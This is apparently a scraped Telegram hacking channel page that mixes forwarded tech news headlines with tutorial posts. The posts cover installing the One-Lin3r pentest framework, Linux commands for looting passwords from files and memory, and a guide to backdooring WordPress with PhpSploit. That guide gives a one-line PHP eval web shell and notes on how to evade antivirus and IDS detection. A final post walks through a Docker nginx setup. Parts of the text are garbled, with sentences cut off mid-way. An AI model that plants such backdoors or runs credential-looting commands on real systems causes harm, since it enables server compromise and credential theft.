UNDERCODE COMMUNITY
2.69K subscribers
1.23K photos
31 videos
2.65K files
80.3K links
πŸ¦‘ Undercode Cyber World!
@UndercodeCommunity


1️⃣ World first platform which Collect & Analyzes every New hacking method.
+ AI Pratice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
β†’ Undercode.help
Download Telegram
Forwarded from UNDERCODE NEWS
Many Vulnerabilities has been patched in Vmware, could allow an attacker to exploit all system.
#Vulnerabilities
Forwarded from UNDERCODE NEWS
Suddenly, Huawei's commercial desktop PC is here! Want to move the cake?
#Technologies
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Updated windows hacking
One-Lin3r is simple modular and light-weight framework gives you all the one-liners that you will need while penetration testing (Windows, Linux, macOS or even BSD systems) or hacking generally with a lot of new features to make all of this fully automated (ex: you won't even need to copy the one-liners).

πŸ„ΈπŸ„½πŸ…‚πŸ…ƒπŸ„°πŸ„»πŸ„»πŸ„ΈπŸ…‚πŸ„°πŸ…ƒπŸ„ΈπŸ„ΎπŸ„½ & πŸ…πŸ…„πŸ„½ :

A) For Linux Debian-based distros. (Ex: Kali, Ubuntu..):
1) git clone https://github.com/D4Vinci/One-Lin3r.git

2) sudo apt install libncurses5-dev

3) sudo pip3 install ./One-Lin3r --user
one-lin3r -h

B) For the rest Linux distros.:

1) git clone https://github.com/D4Vinci/One-Lin3r.git

2) sudo pip3 install ./One-Lin3r --user
one-lin3r -h

F E A T U R E S ::
It's designed to fix typos in typed commands to the most similar command with just one tab click so seach becomes search and so on, even if you typed any random word similar to an command in this framework.
For you lazy-ones out there like me, it can predict what liner you are trying to use by typing any part of it. For example if you typed use capabilities and clicked tab, it would be replaced with use linux/bash/list_all_capabilities and so on. I can see your smile, You are welcome!
If you typed any wrong command then pressed enter, the framework will tell you what is the nearest command to what you have typed which could be the one you really wanted.
Some less impressive things like auto-complete for variables after set command, auto-complete for liners after use and info commands and finally it converts all uppercase to lowercase automatically just-in-case you switched cases by mistake while typing.
Finally, you'll find your normal auto-completion things you were using before, like commands auto-completion and persistent history, etc...

▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from UNDERCODE NEWS
From the IT perspective Predicting Biden’s US in 2021
#Analytiques
Forwarded from UNDERCODE NEWS
Young people β€œkilled” by online loans
#international
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘SOME LINUX TIPS :

A) Looting for passwords
Files containing passwords
grep --color=auto -rnw '/' -ie "PASSWORD" --color=always 2> /dev/null
find . -type f -exec grep -i -I "PASSWORD" {} /dev/null \;
Old passwords in /etc/security/opasswd
The /etc/security/opasswd file is used also by pam_cracklib to keep the history of old passwords so that the user will not reuse them.

B) ⚠️ Treat your opasswd file like your /etc/shadow file because it will end up containing user password hashes

Last edited files
Files that were edited in the last 10 minutes

find / -mmin -10 2>/dev/null | grep -Ev "^/proc"
In memory passwords
strings /dev/mem -n10 | grep -i PASS
Find sensitive files
$ locate password | more
/boot/grub/i386-pc/password.mod
/etc/pam.d/common-password
/etc/pam.d/gdm-password
/etc/pam.d/gdm-password.original
/lib/live/config/0031-root-password

(from git)
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from UNDERCODE NEWS
Entos Information & Communication launches electronic access list + face recognition heat detection solution'NARMS
#international #Technologies
Forwarded from UNDERCODE NEWS
KT Holds’Communication Big Data Platform Road Show’, which gathered in one place for communication big data
#international
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Backdooring WordPress with Phpsploit:

PhpSploit is a remote control framework, aiming to provide a stealth interactive shell-like connection over HTTP between client and web server. It is a post-exploitation tool capable to maintain access to a compromised web server for privilege escalation purposes.

πŸ„ΈπŸ„½πŸ…‚πŸ…ƒπŸ„°πŸ„»πŸ„»πŸ„ΈπŸ…‚πŸ„°πŸ…ƒπŸ„ΈπŸ„ΎπŸ„½ & πŸ…πŸ…„πŸ„½ :

download https://github.com/nil0x42/phpsploit

When running Phpsploit and generating a standard backdoor to place in WordPress or PHP-code it looks like this:

<?php @eval($_SERVER[β€˜HTTP_PHPSPL01T’]); ?>

The above code can be generated by running the following command:

./phpsploit --interactive --eval "backdoor"
And if we insert this little eval-code snippet into a WordPress php-file and then upload the file to VirusTotal the detection rate looks like this for the 58 different antivirus-scanners currently online virus total

ust one hit and it is ClamAV detecting the backdoor as Php.Trojan.PhpSploit-7157376-0.

If we then run phpsploit again and set another PASSKEY

as exampleAnd should be quite easy to trigger IDS alerts at network level since PHP-code like eval and base64_decode should not be a part of a http-header. This can also of course be changed in Phpsploit by using the command set REQ_HEADER_PAYLOAD.

from wpsec
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from UNDERCODE NEWS
Veraport's abused supply chain attack, how do general users respond?
#Vulnerabilities #CyberAttacks
Forwarded from UNDERCODE NEWS
Chinese electronic social security card application exceeds 300 million.
#Analytiques
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Download & run nginx

1) [root@localhost my.Shells]# docker images
REPOSITORY TAG IMAGE ID CREATED SIZE
docker.io/redis latest 1e70071f4af4 6 weeks ago 106.7 MB

2) [root@localhost my.Shells]# docker pull nginx //δΈ‹θ½½nginx
Using default tag: latest

3) Trying to pull repository docker.io/library/nginx ...
latest: Pulling from docker.io/library/nginx
e7bb522d92ff: Pull complete
6edc05228666: Pull complete
cd866a17e81f: Pull complete

4) Digest: sha256:285b49d42c703fdf257d1e2422765c4ba9d3e37768d6ea83d7fe2043dad6e63d
[root@localhost my.Shells]# docker images
REPOSITORY TAG IMAGE ID CREATED SIZE
docker.io/nginx latest 3f8a4339aadd 3 weeks ago 108.5 MB

docker.io/redis latest 1e70071f4af4 6 weeks ago 106.7 MB

4) Run nginx

[root@localhost my.Shells]# docker run -p 8080:80 -d docker.io/nginx

c0462d5e18783e20f9515108fa62ab0f2ac808ea85370a7c82aee9407abf4672
[root@localhost my.Shells]# netstat -anp | grep 8080

tcp6 0 0 :::8080 :::* LISTEN 2529/docker-proxy-c

5) [root@localhost my.Shells]# docker ps //nginxε·²η»εœ¨θΏθ‘ŒδΊ†
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
c0462d5e1878 docker.io/nginx "nginx -g 'daemon off" 4 minutes ago Up 4 minute

6) Run results

[root@localhost my.Shells]# ./openFirewallPort.sh
---openFirewallPort.sh-------

echo "enter the port: "
read port
firewall-cmd --add-port=$port/tcp

▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁